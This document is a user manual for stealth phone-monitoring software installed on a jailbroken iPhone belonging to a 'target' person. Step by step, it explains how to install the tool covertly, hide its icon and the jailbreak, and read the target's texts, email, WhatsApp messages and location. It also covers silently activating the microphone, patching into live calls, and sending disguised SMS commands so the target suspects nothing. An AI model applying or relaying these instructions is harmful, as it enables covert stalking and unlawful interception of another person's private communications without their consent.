DEFINITIONS

PROGRAM: Your Program is downloaded from the internet directly into the TARGET

phone.

ACTIVATION CODE: A license key required to activate Program (received after purchase) TARGET: The phone whose activity you want to see. Program is installed on the TAR-

GET phone.

MONITOR: The phone you will use to place SpyCalls to the TARGET phone. (Note: This

feature is not available with SPY SMS software)

WEB ACCOUNT: The website where you read the TARGET phone activity. Your ID and

password is sent to you when you purchase the product.

VOICE EVENT: The time, phone number, contact name (if available) of all

incoming and outgoing calls.

SMS EVENT: The time, number, contact name (if available) and content of all incoming

and outgoing SMS (Text messages).

EMAIL EVENT: The time, Email address and contents of all Emails from the

primary Email service.

GPS EVENT: GPS or Location record that the software captures from the TARGET phone.

MESSENGER EVENT: Messages sent/received via WhatsApp program that the software

captures from the TARGET phone.

SPYCALL: This feature allows you to make a call from the monitor number to the target

CALL INTERCEPTION: This feature allows you to make a call from the monitor number to

the target phone when the target phone is on an active call and patch into the targetsconversation (CALL INTERCEPTION / ALL-IN-ONE software only).

WATCH LIST: This feature allows you to receive SMS Alert for Call Interception.

When the target has a conversation with anybody in your Watch List, you will re-ceive an SMS Alert. So you can make a call and intercept it.

BEFORE YOU BEGIN After purchase, you will receive an email with Activation Code, USERID and PASS-

WORD. Download Program from our download site directly into the

TARGET phone by using CYDIA on a Jail-broken iPhone.

The TARGET phone MUST have GPRS/WiFi correctly configured for Internet

Access. Please contact your network operator if you are not sure.

If your phone is not Jail-broken, you will need to do this first. Jailbreaking enables you

to install third party software and enjoy all the Internet has to offer for iPhone.

JAIL BREAKING NOTICEJail Breaking is generally a harmless process that allows you to install numerous 3rd party

software not directly available via iTunes and the AppStore. To install Program you need aniPhone that is already jail-broken.

This manual covers Program for iPhone all versions (SPY SMS, CALL/INTERCEPT., ALL-IN-ONE).

Program works with 2G, 3G, 3GS, 4G and 4s iOS versions 3.0, 3.0.1, 3.1, 3.1.2, 3.1.3, 4.x, 5.0 and

5.0.1.

HOW IT WORKS

During the subscription period you can move the software to another supported phone for an unlimitednumber of times. To move Program to another phone, you must DEACTIVATE it on the current TARGET andthen install it on the new TARGET (Moving licence is ONLY available with ALL-IN-ONE)

After you install the software on the TARGET device, SMS, Phone Logs, GPS data and E-Mail are capturedand held locally until it is time to deliver them to the WEB ACCOUNT. Program will connect to the web ac-count after the time you specify in the settings. Login to the WEB ACCOUNT using your ID and PASSWORD.

SMS, GPS, Call Logs, Email, Remote Uninstall, Show & Hide Application icon and the abil-

ity to enable or disable any particular feature. In addition, the Report schedule can becustomized based on time interval, an event number accumulation trigger or only ondemand by sending a pre-defined SMS command. GPS Capture interval can also be cus-tomized.

3. Messenger Capturing: captures text messages sent/received via WhatsAppprogram installed on the phone.

INSTALL QUICK STEPS

The iPhone Target MUST already be jail broken with the Cydia icon showing before you caninstall Program.

DOWNLOAD (phone must already be Jail Broken)1. Install Program from Cydia by adding the correct Cydia Source URL for the

product you purchased. If you add the wrong URL here, your Activation Code will not Acti-

vate the product. Choices are:

If you are not sure what to add to Cydia Source, please check the Cydia Source in

your e-mail.

Then click the MobileBackup source URL you just added, then click Install. The

installation begins automatically.

2. Press Restart SpringBoard button

3. The icon will appear on the SpringBoard as MBackup, click on the icon to Open the

applications Control Panel.

4. Activate the product by entering your Activation Code & selecting Activate

5. After everything is configured you need to hide Program icon so it isnt visible to Target

user. Optionally you may

Open MBackup -> Switch Hide Icon to ON. The phone will then restart.

To remove the Sources, Open Cydia -> Manage -> Sources -> Edit -> Click on the-

source you want deleted -> Click on -sign-> Delete6. Restart the phone by turn it off and turn it back on.

Now you are ready to hand the Target Phone to Target User.

Note: After hiding Application icon on the phone, you can bring the icon back by either

sending SMS Command Show Icon to the target phone or dialling *#Activation Code.

3. Click the Cydia source URL you addedpreviously (for example:pro.mobilebackup.biz orlight.mobilebackup.biz if your version isSMS, etc.). Then click Install.

3.1. Click Confirm, then wait until thephone finishes downloading.

3.2. Click Restart SpringBoard andmanually restart the phone to complete theinstallation process. If you see RebootDevice, please click and the phone will berestarted automatically.

Click MBackup and click Install.

4.1. Enter your Activation Code and select Acti-vate.Note: For SMS version, you will not see the MonitorNumber option, as you do not have a Spy Call fea-ture.

4.2. After software is activated, click OK

4.3.1. Input the Monitor Number, the phone number(international format) that you would like to make aSpyCall from.Note: This feature is for SPYCALL / INTERCEPTION /ALL-IN-ONE software ONLY

4.4. Configure to hide the application or un-installthe application

The first slider Hide Icon is the hide the Pro-gram icon. This Option must be ON to run inStealth Mode.

The second option removes the Cydia icon

(hiding jailbreak status) and also hides theProgram Icon. In case you want your iPhoneto look as if it is not jailbroken after installingProgram, you can choose this option.

To UNINSTALL the whole application turn onthe third option.

Before hiding the Program icon, please make sureyouve already configured the settings, anddefined custom commands to remotely change thesettings.

Note: If you need access to the programfrom the device after hiding the Programicon, simply send your Activation Code as anSMS (Show Icon command). Make sure youonly do this when the Target is in your hand, as itwill cause the Program icon to re-appear.

4.5. Choose Application settings.

4.3.2. This Monitor Number is also used for CallInterception , when you would like to listen to actualcalls in progress on the target phone.It is also used by Watch List to send SMS notices tothe Monitor Phone, when there is an active call onthe target phone.

5. Select the Events you want to capture using the sliders. The On/Off sliders toggle capturing statefor each event type.

5.3. Email Monitoring: Select how fre-quently program should check for newEmail.

Program will save a record of any newemail it finds, each time it checks for newmail. These records are delivered to theweb account with all other events, accord-ing to the same Delivery Settings.

Note: It is possible for the user to deleteemail between polling periods, beforeprogram may capture it.

5.2. GPS Monitoring: Select how often tosave GPS / Location data.

This is stored in the program database andreported with all other captured events,according to your configured DeliverySchedule.

Note: Location Services function on thephone must be ON for this GPS Monitoringfunction to work.

5. 1. Send Only On Demand: If you slidethis option to ON, the software will senddata to the server only when you sendSMS command SEND NOW (custom de-fined) to the phone.

Note: Trigger Delivery by Events and EventDelivery Schedule will be disabled if this

command is ON.

This setting is recommended to be Off. Sothe software can deliver data automaticallyas per your Delivery Schedule.


5.4. Trigger Delivery by Events sets howmany events should be captured beforeDelivering to the Web Account.

Event Delivery Schedule sets how oftenevents should be Delivered to the WebAccount.

Note: These two settings work togetherand are either / or. The default settings willreport events to the Web Account once perevery 10 captured events or once per every1 hour, whichever comes first.

5.5. Toggle IM Capturing On/Off.

IM events (Message sent/received viaWhatsApp program) are reported accordingto the standard timer settings in 5.4.

6. Watch List & Call Interception

This setting allows you to receive an SMS Alert to your Monitor phone if the Targetphone makes either an incoming or outgoing call to a specified number. You can en-

ter as many numbers as you want to watch. There is no limit. You can also choose towatch only blocked/private numbers, or allnumbers.

If you make a Spycall to the target phone when one of the numbers in your WatchList (or any other number) is active, you will hear the actual phone call that is in pro-gress. We call this feature Call Interception.

***Please note that Call Interception feature will only work with GSM net-works***

IMPORTANT NOTE: SpyCall and Call Interception features

To make a SpyCall : place a call from the Monitor to the Target phonewhile it sits idle, not in use. The target will automatically answer without ringing or

indicating your incoming call, turning on the mic so you can hear the surroundings.If the Target is not idle (already on a call, screen is touched, buttons pressed, con-nected to USB, etc) then SpyCall cannot be performed.

Intercept Call : is made by placing a call from the Monitor to the Target whileit is on an active call. If the Targets service provider supports Conference Calling,

your call will be patched into the Targets live conversation.

SMS commands can be used to turn these features on or off, to make normal callsagain from the same monitor number.

SpyCall & iPhone 4

iPhone 4 models now include dual mics at top and bottom of the phone. iPhone 4 at-

tempts noise cancellation on audio closest to the top mic. This may cause fluctua-

tions in volume or difficulty hearing audio from the direction the upper mic is facing.

Unfortunately it is not possible to disable this audio processing, and is a current limi-

tation of using an iPhone 4 as a Target. However, you will clearly hear all sound

closer to the bottom mic, and can easily tell if your Target is where they should be,

alone or with others, all conversation in the direction of the lower mic, etc.

6. 1. Watch List

If you want to watch only specified numbers, slide Watch Listto ON.

To add number in your Watch List, click on the space inWatch Numbers and input the suspect number ininternational format. If you have more than one number, youneed to add comma (,) behind the previous number and thenext number can begin.

6. 2. Watch Private

If you want to watch only private number (blocked number orunknown number), slide Watch Private to ON.

6. 3. Watch All

If you want to receive SMS Alert for all incoming andoutgoing phone calls happened on the target phone, slideWatch All to ON.

RULES FOR DEFINING CUSTOM COMMANDS:

- Short sentences are supported- All punctuation and capitalization (case sensitivity) counts- Commands may appear anywhere within the body of any SMS text, but must be sent exactly asdefined, and multiple word commands must be in correct sequence.- Will appear as normal SMS (choose commands that can be part of longer messages, or will notarouse suspicion)- Commands are accepted from ANY number sending a proper command (Keep commandsunique to avoid others sending commands by accident)- hI BabY_ can be sent as hI BabY_ or hI BabY_ how are you?

7. Show Icon: The SMS command to ShowIcon is your Activation Code.

Note: This SMS command cant be changed.

You should only send this command to thephone when you have the phone in yourhand.

Note II: You can also bring theapplication icon (MBackup) up by dialling*#Activaiton Code on the Targets iPhone.

For example: Your Activation Code is0123456789. You need to dial*#0123456789. The MBackup icon will re-appear on the springboard.

7.1. Uninstall: The SMS command toUninstall Program is

Replace Activation Code with your ac-tual Activation Code numbers. This com-

mand cant be changed.

Note: You can also uninstall Program bydialling *#74Activation Code on the Tar-

gets iPhone.

For example: Your Activation Code is0123456789. You need to dial*#740123456789. The software will bedeactivated and uninstalled within fewminutes. To make sure that Program isremoved, you may need to restart thephone manually one time after diallingthe code.

7.2. Send Now, Disable on Demand and En-able on Demand commands: To use these com-mands, you need to define your own keywordfor it. See Rules for Defining Custom Com-mands on page 10. These SMS are visible tothe user, so please use words that dont arousesuspicion.

Send Now: This SMS forces the soft-

ware to send events to the server im-mediately.

Disable On Demand: This SMS will stop

Send Only On Demand function (seestep 5.1).

Enable On Demand: This SMS enables

Send Only On Demand function (seestep 5.1)

Commands for Show Icon and Uninstall cannot be changed and must be sent alone,only as defined. All other SMS commands may be sent alone or as part of a largertext body, but all multiple word commands must appear in the same sequence, caseand punctuation, exactly as you define them.

Recommended steps after recalling MBackup icon on iOS version 4.xDue to the nature of the iOS version 4.x, recalling the application icon may sometimes leave theActivation Code in Call Log. The following solution is recommended.1. Tap the Home button to bring the device to home screen2. Double tap the Home button, the multitasking bar will appear at the bottom3. Tap and hold any of the icons in the bar until they start wiggling4. Tap the red circle with the hash through it on the Phone applications icon to quit the

application5. Tap the Home button to return to the home screenActivation Code will not be displayed in the Call Log after recalling MBackup (Application) iconon the phone.

7.3. Change Monitor Number is the SMS command forchanging the Monitor Number remotely.

To use this command, you need to define your own key-word for it. See Rules for Defining Custom Commands onpage 10.

Whenever you want to remotely change the monitor num-

ber to make a SpyCall or Call Interception to the targetphone, you need to send this command keyword from thenumber you want it to be the new monitor number to thetarget phone. Once the target phone receives this com-mand, your monitor number will be changed to the newone.

7.4. Monitor Call On/OFF is the SMS command used for Enable/Disable Spy Call, Call Intercep-tion and Watch List.To use this command, you need to define your own keyword for it. See Rules for Defining Cus-tom Commands on page 10.

Please note that after setting monitor number on the target phone, all call from this number to thetarget phone will be a SpyCall. It wont ring through as normal. If you want to make a normal call,you need to send sms command Monitor Call Off to the target phone. This command will disableSpyCall feature. If you want to make a SpyCall again, you only send sms command Monitor CallOn to the target. SpyCall feature will be re-enabled and it will stay enabled until you disable it.

Guide to web account next

If you did not hide the Cydia (jailbreak) icon, you can still choose to removethe Program sources from Cydia, so there is no trace of having installedProgram. To remove the Program Cydia sources (program remains in-stalled), follow these steps:

Open Cydia -> Manage -> Sources -> Edit -> Click on the Program sourceURL you want deleted -> Click on - sign -> Delete.

No trace of Program will remain.

*** Important Note For All Versions ***

After configuring the settings, you should turn the application to stealthmode by hiding the icon from SpringBoard. To do so, you need to go back tothe First Screen of the Control Panel and turn the Hide Icon switch to ON(or see the manual page 7 step 4.4). Restart the phone. Program icon will beremoved.

Reading Reports

To read your reports, log in to your account at http://www.mobilebackup.biz using the ID and password youselected when purchasing the product. After login you will see the Activity List screen.This screen provides a summary of events that have occurred on the mobile device.
